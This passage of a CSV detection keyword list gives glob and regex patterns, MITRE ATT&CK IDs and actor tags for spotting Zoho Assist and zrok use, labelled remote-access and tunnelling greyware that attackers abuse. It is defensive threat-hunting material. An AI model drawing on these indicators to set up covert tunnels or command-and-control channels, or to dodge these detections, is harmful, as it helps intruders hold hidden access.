T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'ServiceName'>Zoho Assist-Remote Support*",".{0,1000}\'ServiceName\'\>Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*turn-*.zohomeeting.com*",".{0,1000}turn\-.{0,1000}\.zohomeeting\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZA_Connect.exe *",".{0,1000}ZA_Connect\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZA_Connect.exe.ApplicationCompany*",".{0,1000}ZA_Connect\.exe\.ApplicationCompany.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZAFileTransfer.exe *",".{0,1000}ZAFileTransfer\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZAService.exe 
*",".{0,1000}ZAService\.exe\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZOHO CORPORATION PRIVATE LIMITED*",".{0,1000}ZOHO\sCORPORATION\sPRIVATE\sLIMITED.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZohoMeeting.exe*",".{0,1000}ZohoMeeting\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZohoMeeting\FileTransferSettings.conf*",".{0,1000}ZohoMeeting\\FileTransferSettings\.conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ZohoMeeting\Service.Conf*",".{0,1000}ZohoMeeting\\Service\.Conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* admin create frontend sqJRAINSiB public *",".{0,1000}\sadmin\screate\sfrontend\ssqJRAINSiB\spublic\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "* -c rest_client_zrok -t*",".{0,1000}\s\-c\srest_client_zrok\s\-t.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "* -s rest_server_zrok -t*",".{0,1000}\s\-s\srest_server_zrok\s\-t.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "* zrok.listener*",".{0,1000}\szrok\.listener.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*$HOME/.zrok*",".{0,1000}\$HOME\/\.zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*.in.zrok.io*",".{0,1000}\.in\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*.share.zrok.io*",".{0,1000}\.share\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*.zrok.quigley.com*",".{0,1000}\.zrok\.quigley\.com.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/.zrok/*.json*",".{0,1000}\/\.zrok\/.{0,1000}\.json.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/.zrok:/.zrok*",".{0,1000}\/\.zrok\:\/\.zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*// NewHTTPClient creates a new zrok HTTP client.*",".{0,1000}\/\/\sNewHTTPClient\screates\sa\snew\szrok\sHTTP\sclient\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/docker/compose/zrok-instance/*",".{0,1000}\/docker\/compose\/zrok\-instance\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/etc/zrok.env*",".{0,1000}\/etc\/zrok\.env.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/etc/zrok/*",".{0,1000}\/etc\/zrok\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/rest_client_zrok/*",".{0,1000}\/rest_client_zrok\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/var/lib/zrok-*",".{0,1000}\/var\/lib\/zrok\-.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok.exe*",".{0,1000}\/zrok\.exe.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok.git*",".{0,1000}\/zrok\.git.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok.zip*",".{0,1000}\/zrok\.zip.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-amd64_darwin_amd64*",".{0,1000}\/zrok\-amd64_darwin_amd64.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-arm64_darwin_arm64*",".{0,1000}\/zrok\-arm64_darwin_arm64.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-controller.log*",".{0,1000}\/zrok\-controller\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-docker/*",".{0,1000}\/zrok\-docker\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-frontend.log*",".{0,1000}\/zrok\-frontend\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*/zrok-share.env*",".{0,1000}\/zrok\-share\.env.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*\zrok.exe*",".{0,1000}\\zrok\.exe.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*\zrok.zip*",".{0,1000}\\zrok\.zip.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*\zrok-controller.log*",".{0,1000}\\zrok\-controller\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*\zrok-frontend.log*",".{0,1000}\\zrok\-frontend\.log.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*>Welcome new zrok user!<*",".{0,1000}\>Welcome\snew\szrok\suser!\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*>Welcome to zrok!<*",".{0,1000}\>Welcome\sto\szrok!\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*>zrok frontend health: ok<*",".{0,1000}\>zrok\sfrontend\shealth\:\sok\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*>zrok test endpoint<*",".{0,1000}\>zrok\stest\sendpoint\<.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*25e850edd1cb8707c9a18a0fcc610b831cce25203dff650ec7e781175d900df3*",".{0,1000}25e850edd1cb8707c9a18a0fcc610b831cce25203dff650ec7e781175d900df3.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*4adeaf8287ac71363bb2c5ccd6b67b8c973f783702c18c444741875375772be1*",".{0,1000}4adeaf8287ac71363bb2c5ccd6b67b8c973f783702c18c444741875375772be1.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*651caf1b8d81a445db65551955dda4aa7df88a0013a81fda506bdfcfe05611b0*",".{0,1000}651caf1b8d81a445db65551955dda4aa7df88a0013a81fda506bdfcfe05611b0.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*9af57a343f42da2250dd4499d6dcff61a7a6395eae77eaab0ddddbe544743116*",".{0,1000}9af57a343f42da2250dd4499d6dcff61a7a6395eae77eaab0ddddbe544743116.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*d5be8ba1112a210428cac87772b6d7902a9b9299b9a658d03ffbc52e9d125593*",".{0,1000}d5be8ba1112a210428cac87772b6d7902a9b9299b9a658d03ffbc52e9d125593.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*def7512aaa595d7cad9b2e237a0ee99e778bbae0a30dd2eba75d099fc80f310f*",".{0,1000}def7512aaa595d7cad9b2e237a0ee99e778bbae0a30dd2eba75d099fc80f310f.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#filehash","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*http*api.zrok.*",".{0,1000}http.{0,1000}api\.zrok\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*http://*.zrok.io*",".{0,1000}http\:\/\/.{0,1000}\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*http://127.0.0.1:18080*",".{0,1000}http\:\/\/127\.0\.0\.1\:18080.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*http://127.0.0.1:9191*",".{0,1000}http\:\/\/127\.0\.0\.1\:9191.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*https://*.zrok.io*",".{0,1000}https\:\/\/.{0,1000}\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*https://zrok.*",".{0,1000}https\:\/\/zrok\..{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*openziti/zrok*",".{0,1000}openziti\/zrok.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*pastefrom b46p9j82z81f*",".{0,1000}pastefrom\sb46p9j82z81f.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*share.zrok.io*",".{0,1000}share\.zrok\.io.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","1","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*tags.zrokShareToken=*",".{0,1000}tags\.zrokShareToken\=.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*the zrok environment was successfully enabled*",".{0,1000}the\szrok\senvironment\swas\ssuccessfully\senabled.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrockify_func(*",".{0,1000}zrockify_func\(.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok admin bootstrap*",".{0,1000}zrok\sadmin\sbootstrap.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok configuration updated*",".{0,1000}zrok\sconfiguration\supdated.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok environment disabled*",".{0,1000}zrok\senvironment\sdisabled.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok share public *",".{0,1000}zrok\sshare\spublic\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. 
zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok share reserved *",".{0,1000}zrok\sshare\sreserved\s.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok test loop public*",".{0,1000}zrok\stest\sloop\spublic.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" "*zrok.environment.root*",".{0,1000}zrok\.environment\.root.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","N/A","N/A","10","10","2458","94","2024-08-27T15:47:36Z","2022-07-18T19:14:51Z" 